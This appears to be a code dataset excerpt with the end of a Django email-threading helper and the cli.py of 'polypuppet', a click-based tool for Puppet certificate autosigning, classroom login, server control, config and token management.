return HttpResponseRedirect('/')
return HttpResponseRedirect('/')
else:
return HttpResponseRedirect('/')
class EmailThread(threading.Thread):
def __init__(self, subject, body, from_email, recipient_list, fail_silently, html):
self.subject = subject
self.body = body
self.recipient_list = recipient_list
self.from_email = from_email
self.fail_silently = fail_silently
self.html = html
threading.Thread.__init__(self)
def run(self):
msg = EmailMultiAlternatives(self.subject, self.body, self.from_email, self.recipient_list)
if self.html:
msg.attach_alternative(self.html, 'text/html')
msg.send(self.fail_silently)
|
cli.py
|
#!/usr/bin/env python3
import logging
import multiprocessing as mp
import os
import sys
import click
import polypuppet.agent.output as out
from polypuppet import Config
from polypuppet.agent.agent import Agent
from polypuppet.agent.vagrant import Vagrant
from polypuppet.exception import PolypuppetException
from polypuppet.messages import Messages
_GRPC_V = 'GRPC_VERBOSITY'
def verbosity_option(f):
def callback(ctx, param, value):
if value > 0:
root = logging.root
root.setLevel(logging.DEBUG)
if value > 1:
os.environ[_GRPC_V] = 'DEBUG'
return value
return click.option('-v', '--verbose', count=True,
expose_value=False,
help='Enables verbosity.',
callback=callback)(f)
@click.group()
@verbosity_option
def cli():
pass
@cli.command(help=Messages.help_autosign())
@click.argument('certname')
@verbosity_option
def autosign(certname):
agent = Agent()
has_certname = agent.autosign(certname)
if not has_certname:
sys.exit(1)
@cli.group('login', help=Messages.help_login())
@verbosity_option
def login_group():
pass
def check_login(response):
if response:
out.info(Messages.logged_in())
else:
out.warning(Messages.not_logged_in())
sys.exit(1)
@login_group.command(help=Messages.help_login_user())
@click.argument('username', required=False)
@click.argument('password', required=False)
@verbosity_option
def user(username, password):
agent = Agent()
if username is None:
username = click.prompt('Username')
if password is None:
password = click.prompt('Password', hide_input=True)
response = agent.login(username, password)
check_login(response)
@login_group.command(help=Messages.help_login_classroom())
@click.argument('building', required=True, type=click.INT)
@click.argument('number', required=True, type=click.INT)
@click.argument('token', required=True, type=click.STRING)
@verbosity_option
def classroom(building, number, token):
agent = Agent()
response = agent.classroom(building, number, token)
check_login(response)
def start_server():
try:
# This prevents error messages on operating systems that are not supported for the server
from polypuppet.server.server import main as server_main
agent = Agent()
agent.stop_server()
server_main()
except ModuleNotFoundError:
out.critical(Messages.unsupported_os())
sys.exit(1)
except PolypuppetException as pe:
out.critical(pe.message)
sys.exit(1)
@cli.group(name='server', invoke_without_command=True, help=Messages.help_server())
@click.pass_context
@verbosity_option
def group_server(ctx):
if not ctx.invoked_subcommand:
start_server()
@group_server.command(name='stop', help=Messages.help_server_stop())
@verbosity_option
def server_stop():
agent = Agent()
if agent.stop_server():
out.info(Messages.server_stopped())
@group_server.command(name='daemon', help=Messages.help_server_daemon())
@verbosity_option
def server_daemon():
process = mp.Process(target=start_server)
process.start()
os._exit(0)
@cli.command(name='config', help=Messages.help_config())
@click.argument('key', required=False)
@click.argument('value', required=False)
@verbosity_option
def manage_config(key, value):
config = Config()
if key is None:
for key, value in config.all().items():
out.info(key + '=' + value)
elif value is None:
out.info(config[key])
else:
config.restricted_set(key, value)
@cli.group(name='test', help=Messages.help_test())
@verbosity_option
def test_group():
pass
@test_group.command(name='classroom', help=Messages.help_test_classroom())
@click.argument('building')
@click.argument('classroom')
@verbosity_option
def test_classroom(building, classroom):
config = Config()
if config['CLASSROOM'] != classroom or config['BUILDING'] != building:
sys.exit(1)
@test_group.command(name='config', help=Messages.help_test_config())
@click.argument('key')
@click.argument('value')
@verbosity_option
def test_config(key, value):
config = Config()
try:
if config[key] != value:
sys.exit(1)
except PolypuppetException:
sys.exit(1)
@test_group.command(name='vm', help=Messages.help_test_vm())
@click.argument('vm_name')
@verbosity_option
def test_vm(vm_name):
vagrant = Vagrant()
if not vagrant.is_created(vm_name):
exit(1)
@cli.group(name='token', invoke_without_command=True, help=Messages.help_token())
@click.pass_context
@verbosity_option
def token_group(ctx):
if not ctx.invoked_subcommand:
agent = Agent()
server_token = agent.get_token()
if server_token != str():
out.info(server_token)
else:
out.warning(Messages.token_not_generated())
sys.exit(1)
@token_group.command(name='new', help=Messages.help_token_new())
@verbosity_option
def token_new():
agent = Agent()
server_token = agent.update_token()
out.info(server_token)
@token_group.command(name='clear', help=Messages.help_token_clear())
@verbosity_option
def token_clear():
agent = Agent()
agent.clear_token()
@token_group.command(name='set', help=Messages.help_token_set())
@click.argument('token')
@verbosity_option
def token_set(token):
agent = Agent()
agent.set_token(token)
def main():
os.environ[_GRPC_V] = 'NONE'
log_level = logging.INFO
log_format = '%(message)s'
logging.basicConfig(format=log_format, level=log_level)
try:
cli()
except PolypuppetException as pe:
out.critical(pe.message)
sys.exit(1)
if __name__ == "__main__":
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.